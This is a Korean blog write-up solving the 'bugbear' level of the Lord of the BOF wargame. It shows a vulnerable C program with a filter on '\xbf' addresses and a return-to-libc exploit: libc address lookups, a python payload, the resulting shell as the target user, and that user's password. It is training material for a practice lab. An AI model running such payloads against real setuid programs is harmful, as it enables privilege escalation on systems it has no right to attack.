[LOB] Level13: darkknight → bugbear

bugbear

keyword : RTL

/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	if(argv[1][47] == '\xbf')
	{
		printf("stack betrayed you!!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]);
	printf("%s\n", buffer);
}

분기문을 통해 RET 부분에 덮여씌워지는 주소 앞주소'\xbf'를 필터링 한다.

즉, '\xbf'로 시작하는 주소를 리턴 주소로 할 수 없다.

payload 시나리오 :

"A"44+"&system()"+"A"4+"&["/bin/sh"]

[darkknight@localhost darkknight]$ ldd bugbear
	libc.so.6 => /lib/libc.so.6 (0x40018000)
	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
	
[darkknight@localhost darkknight]$ strings -tx /lib/libc.so.6 | grep "/bin/sh"
  e3ff9 /bin/sh
  e6587 /bin/sh
  e6595 /bin/sh
  e796a /bin/sh
  e81c7 /bin/sh
  e8778 /bin/sh

&system : 0x40058ae0

&"/bin/sh" : 0x400fbff9

[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"A"*4+"\xf9\xbf\x0f\x40"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@AAAA�@
bash$ my-pass
euid = 513
new divide
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)

 

bugbear / new divide

 

잘못 된 개념을 서술하였거나, 잘못 풀이된 내용이 있으면 댓글 달아주시면 감사합니다 :) 태클 댓글이나 메일(513.eunice@gmail.com) 환영입니다 !! 😊☺️👍